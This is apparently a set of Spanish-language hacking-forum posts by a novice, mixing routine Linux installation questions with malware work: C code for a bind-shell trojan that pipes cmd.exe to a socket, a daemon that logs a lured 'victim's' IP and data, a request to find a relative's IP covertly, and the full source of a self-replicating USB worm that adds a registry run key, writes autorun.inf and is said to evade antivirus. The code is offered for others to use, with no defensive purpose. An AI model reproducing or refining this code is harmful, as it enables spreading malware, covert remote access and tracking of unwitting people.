Buenas, pues estaba pensando en como abrir una cmd remota a traves de un troyano. Al principio pense en dup2, pero no me funcionaba correctamente. Se hacer un troyano inverso, pero quiero hacer un de conex. directa: Cuando me conecte, que me salte una cmd remota. Pero no se exactamente como hacerlo. Uso sockets en C.
Espero sus respuestas y sugerencias. Saludos y gracias

Buenas, estoy programando un mini-server en C,  que en Linux he desarrollado bastante mejor, pero necesito en Windows.
He escrito este code para ir mejorandolo, pero "algo" hace que se salte el accept y aunque nadie se conecte salta al siguiente paso xD.

El code:

#include <stdio.h>
#include <stdlib.h>
#include <winsock.h>
 
int main ()
{
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2, 0), &wsaData);
 
    struct sockaddr_in host, client;
    int a=sizeof (struct sockaddr);
    SOCKET newsock;
    SOCKET sockfd=socket (2, 1, 0);
    host.sin_family=AF_INET;
    host.sin_addr.s_addr=0;
    host.sin_port=htons (31337);
    memset (host.sin_zero, 0, 8);
 
    bind (sockfd, (struct sockaddr*)&host, sizeof (struct sockaddr*));
    listen (sockfd, 1);
    while (1)
    {
        newsock=accept (sockfd, (struct sockaddr*)&client, &a);
        send (newsock, "Hola!\n", 6, 0);
        printf ("Conex. correcta.\n");
        closesocket (newsock);
    }
    closesocket (sockfd);
    return 0;
}
 

Qué falla??? Como ven sale infinitamente el printf!!! Y nadie se conecta!!! Y no te puedes conectar!!!

Saludos y gracias

Saludos

buenas estoy haciendo un troyanito que simplemente abra una cmd en windows, pero tengo un problema:
lo que uso es un dup2 para duplicar los descriptores de salida y entrada STDIN y STDOUT k corresponden con los descriptores 1 y 0. los duplico dirigiendolos al socket abierto, pero no me funciona. el cmd se abre en la ventana del troyano que luego voy a ocultar, por lo que no me sirve xD

les dejo el code: Dev-Cpp Windows 7 C:

#include <stdio.h>
#include <string.h>
#include <winsock.h>
#include <sys/types.h>
 
int main ()
{
    WSADATA wsaData;
    WSAStartup(MAKEWORD(1, 1), &wsaData);
 
	SOCKET sockfd, newsock;
	struct sockaddr_in client, host;
    int a=sizeof (client);
 
	sockfd=socket (2, 1, 0);
	host.sin_family=AF_INET;
	host.sin_addr.s_addr=0;
	host.sin_port=htons (33333);
	memset (host.sin_zero, '\0', 8);
 
	bind (sockfd, (struct sockaddr*)&host, sizeof (host));
	listen (sockfd, 1);
 
	while (1)
	{
		newsock=accept (sockfd, (struct sockaddr*)&client, &a);
		send (newsock, "Conexion finalizada.\n", 21, 0);
		dup2 (STDIN, newsock);
		dup2 (STDOUT, newsock);
		dup2 (STRERR, newsock);
		WinExec ("cmd.exe", SW_NORMAL);
		closesocket (newsock);
	}
 
	closesocket (sockfd);
	return 0;
}
 

Nota: Linkeo desde un proyecto, pero quiero hacerlo desde linea de comandos. se k se ha hablado muxo xro sigo sin conseguirlo fuera de graficos....
linkeo a C:/Dev-Cpp/lib/libwsock32.a k es la k va en el 7.

saludos y gracias

Lh: No hagas doble post.

agradeceria que alguien respondiese

antes de continuar, dire que lo volvi a escribir en Linux Ubuntu. A ver k tal:

#include <stdio.h>
#include <string.h> 
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
 
int main()
{
	int sockfd, newsock;
	struct sockaddr_in server, client;
	int a;
 
	sockfd=socket(2, 1, 0);
	server.sin_family = AF_INET;
	server.sin_port = htons(31337);
	server.sin_addr.s_addr = 0;
	memset((struct sockaddr*)server.sin_zero, '\0', 8); 
 
	bind(sockfd,(struct sockaddr*)&server, sizeof(struct sockaddr));
	listen(sockfd,3);
 
	while(1)
	{
		a=sizeof(struct sockaddr_in);
		newsock=accept(sockfd, (struct sockaddr *)&client, &a);
		dup2 (stdin, newsock);
		dup2 (stdout, newsock);
		dup2 (stderr, newsock);
		fprintf (stdin, "Hola");
		close (newsock);
	}
	return 0;
	close(sockfd);
}
 

Donde dice "Hola" en el fprintf deberia escribir en el socket "newsock", pero no lo escribe en algun lado.
Echenme una mano por favor!!!


Lh: No hagas doble post, utiliza el botón modificar. Ten paciencia para esperar la respuesta.
Proximo doble post y borro directamente.

Buenas, se que la participacion es voluntaria pero necesito urgentemente una respuesta, por favor.
Alguien puede echarme una mano?

Saludos y gracias

Bueno, el otro dia postee en el subforo de Messenger, Chats... k como le sacaba la IP "real" a la victima pues la k aparecia en REAL IP, o algo asi, no era la buena...
pues aparte de k si es la buena, se me ocurrio otro metodo + eficaz xD

escribi un programa en C k esperase coenxiones en un puerto a indicar, y lo registrase todo en un archivo.
pues bien, lo k hice fue hacer kill al apache y lo puse en el p 80. le pase mi ip y le dije: "Conectate aki, ya veras... etc."
se conecta y queda registrada la Ip de la victima, con muxa mas info del ordenata destino.

si alguien kiere aplicar la idea, aki les dejo el code xD

#include <sys/socket.h>
#include <arpa/inet.h>
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
#include <signal.h>
#include <time.h>
 
int socketfd, newsocket;
 
void shutup (int signal)
{
	FILE *log;
	log=fopen ("/var/log/smallserver.log", "a+");
	times ();
	fprintf (log, "Shutting down...\n\n");
	fclose (log);
	close (newsocket);
	close (socketfd);
	exit (0);
}
 
int times ()
{
	FILE *log;
	time_t now=time (0);
	struct tm *ahora;
	char buffer [40];
	ahora=localtime ((const time_t*)&now);
	strftime (buffer, 40, "%d/%m/%Y %H:%M:%S" , ahora);
	log=fopen ("/var/log/smallserver.log", "a+");
	fprintf (log,"%s   ", buffer);
	fclose (log);
	return 0;
}
 
int main (int argc, char *argv [])
{
	if (getuid()!=0)
	{
		printf ("This proccess must be run by root.\n\n");
		return 1;
	}
	if (argc!=2)
	{
		printf ("Error:\nUse: %s <PORT>\n\n", argv [0]);
		return 1;
	}
	int cont;
	FILE *log;
	struct sockaddr_in client, host;
	char buffer [1024];
	int size=sizeof (client);
 
	socketfd=socket (2, 1 ,  0);
	host.sin_family=AF_INET;
	host.sin_port=htons (atoi (argv [1]));
	host.sin_addr.s_addr=0;
	bind (socketfd, (struct sockaddr*)&host, sizeof (struct sockaddr));
 
	listen (socketfd, 3);
 
	log=fopen ("/var/log/smallserver.log", "a+");
	times ();
	fprintf (log, "Starting up...\n\n");
	fclose (log);
 
	signal (SIGTERM, shutup);
	signal (SIGINT, shutup);
 
	printf ("Forking process...");
	daemon (1, 0);
 
	while (1)
	{
		newsocket=accept (socketfd, (struct sockaddr*)&client, &size);
 
		log=fopen ("/var/log/smallserver.log", "a+");
		times ();
		fprintf (log, "Got connection from %s:%d\n", inet_ntoa (client.sin_addr), ntohs (client.sin_port));
		fclose (log);
 
		cont=recv (newsocket, &buffer, 1024, 0);
		while (cont>2)
		{
			printf ("%d", cont);
			log=fopen ("/var/log/smallserver.log", "a+");
			times ();
			buffer [cont-1]='\0';
			fprintf (log, "RECV %d bytes: %s \n", cont-2, buffer);
			fclose (log);
 
			cont=recv (newsocket, &buffer, 1024, 0);
		}
		log=fopen ("/var/log/smallserver.log", "a+");
		times ();
		fprintf (log, "Finishing connection from %s:%d\n\n", inet_ntoa (client.sin_addr), ntohs (client.sin_port));
		fclose (log);
		close (newsocket);
	}
	close (socketfd);
	return 0;
}

se k es bastante simple, xro me costo un pokito xD k estoi aprendiendo...
si alguien cree k es mejorable, k postee como. estoi interesado (stoi aprendiendo, otra vez xD)

Buenas, se que este tema sta muy visto y k pensaran: "Joer, otro lammer estupido", xro no es asi, solo k le quiero demostrar a un familiar k tener 14 programas P2P y demas abiertos a la vez es malo, xro necesito la IP, sink se de cuenta.
no me vale la ingenieria social y pense en un correo Hotmail...
me puse a leer un poco (uso Gmail xD no se muxo de eso) y vi la tipica pregunta.
bien:

MI IP al conectarme (COMPROBADO): 192.x.x.33    [tipica]
IP que me sale varias veces:               212.170.48.5

resultado de GeoLocalizador de IP: Madrid [NOPPPPP]



se perfectamente k puede variar x el server, etc...
es estado buscando muxo en como encontrar la real. xro no encuentro la solucion.

como puedo encontrar la real sin ingenieria social? el objetivo tiene Tuenti, MSN, etc...
no creo k valga el "netstat -a" xk eso esta muy pasado xD

llevo tiempo pensando... ayudenme!!!

Buenas, tengo un problemilla. Estoy instalando el Fedora, despues de ver que el Red Hat no me va.
Pues bien: El ordenador me venia con una sola particion, que llevaba el Vista. Un amigo la dividio, e instalo el Ubuntu 9.04.
Hace poco, formatee por error la segunda particion, e instale el Ubuntu 10.4. La tabla de particiones se quedo asi:

sda1          1500 MB        ntfs
sda2          119078 MB    ntfs
sda3          3072 MB        ntfs
sda4                                extendida
   sda5      110114           ext4
   sda6      4708              swap



Ahora, yo quiero dejar:

sda1         1500 MB      ntfs
sda2          119078 MB    ntfs
sda3          119078 MB    ntfs
sda4          4708 MB    swap


estoi en la instalacion del Fedora (en el Live CD), y no tengo ni idea de esto. k hago???
espero sus respuestas

buenas:
necesito que me pasen una URL buena para descargar Nmap en linux. Ya se k hay muxas paginas, pero no puedo compilar ninguna.
ayudenme!!!

ubuntu 9.04

Buenas:
 Consegui un Todo en Uno v7, y ahora quiero hacer una copia. Abro el Nero, y lo intento copiar, pero me da error de lectura. El disco funciona perfectamente. Alguien sabe como arreglarlo, o como descargar esta misma version SIN Torrent o eMule???


gracias

El caso: Me descargue los ISOs de Red Hat de http://mirror.informatik.uni-mannheim.de/pub/linux/distributions/redhat/9.0/, y los grabe con Nero en tres discos vírgenes. Reinicie, meti el primer disco, y empezo el problema....
1º Al darle a iniciar en modo grafico, se me abria en modo texto.
2º La pregunta seria si quiero chekear los discos. Pues no. Me pregunta directamente el idioma de instalacion y teclado.
3º Luego viene lo raro: Me pregunta de donde saca los ISOs, y cuando selecciono CD-ROM, me dice k no reconoce los componentes, que los elija de una lista. No va ninguno.

Se que ya han hablado de esto en muxos sitios, pero no consigo solucionarlo... Llevo meses con esto!!!
Datos del PC:
Toshiba Satellite nuevecito, tiene unos meses. Preinstalado Windows Vista Home Premium. Bien cuidado. Particionado en dos, instalado Ubuntu 9.04, que es donde lo voy a instalar.
3 GB Ram.
Procesador: Intel Pentium Dual CPU T3400 @ 2.16 GHz 2.17 GHz. Sistema operativo 32 bits.
Service Pack 1, activadito y legal. Sin virus, y normalmente sin conex. a internet (lo cuido muxo XD!!!). Actualizado, con antivirus ESET correcto.



Cualquier duda de lo k sea, preguntenmela aqui...
AYUDENME X FAVOR

Buenas, despues de muxas preguntas aqui, me desconecte de internet, e intente acer algo facilito. Cree el virusaco "boot.exe", que es taan efectivo k consume todos los recursos del PC, y eso k era un simple gusano...
luego me encerre a jugar al Counter un tiempo... un dia le eche un vistazo al escritorio y vi a mi bonito Dev-Cpp sucio y desgastado... empeze a programar!!!

despues de 2 bonitas horas de prácticas, nacio SYS32.exe!!!!


os pongo el codigo para k le echeis un vistazo. es muy sencillo, no se como no lo hice antes....

#include <windows.h>
#include <stdio.h>
 
int a;
FILE *fp;
char nowdir [50];
char usb [12][5]={"D:\\", "E:\\", "F:\\", "G:\\", "H:\\"};
char usb2 [12][5]={"D:\\", "E:\\", "F:\\", "G:\\", "H:\\"};
 
int main ()
{
    GetModuleFileName (NULL, nowdir, 256);
    CopyFile (nowdir, "C:\\Temp\\sys32.exe", 0);
    registro ();
    while (1)
    {
          pendrive ();
	  sleep (5);
    }
}
 
int registro ()
{
    HKEY hkey;
    RegOpenKeyEx (HKEY_CURRENT_USER,"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 0, KEY_SET_VALUE, &hkey);
    RegSetValueEx(hkey,"run",0,REG_SZ,"C:\\Temp\\sys32.exe",50);
    RegCloseKey(hkey);
}
 
int pendrive ()
{
    for (a=0; a<=5; a++)
    {
        if (GetDriveType (usb [a])==2)
        {
             strcat (usb [a], "\\sys32.exe");
             CopyFile (nowdir, usb [a], 0);
 
             strcat (usb2 [a], "\\autorun.inf");
             fp=fopen (usb2 [a], "wb+");
             fprintf (fp, "[autorun]\nopen=sys32.exe");
             fclose (fp);
             fp=fopen (usb2 [a], "rb+");
        }
    }
}
 

funciona asi:
1. Se copia a "C:\Temp".
2. Se añade al registro, en una llave en la que todos tienen permisos, pero en la que puedes hacer que se abra al inicio de sesión. La única pega es que solo se abre en la sesion en la que se abre.
3. Hace un bucle infinito comprobando si se enchufan pendrives. Si se enchufan, se copia a este sitio, y crea un autorun. Lo cierra para guardar cambios y lo abre para k no lo borres.

Lo mejor es que no lo detecta ningun antivirus (por ahora, pork sin querer lo mande a analizar a ESET. a ver cuanto dura).+


Importante: El code es mio, y sus ideas, pero he de recordar que "http://usuarios.multimania.es/inyx/Gusano%20basico.pdf" me enseño a copiarme al registro. Como veis, es completamente diferente.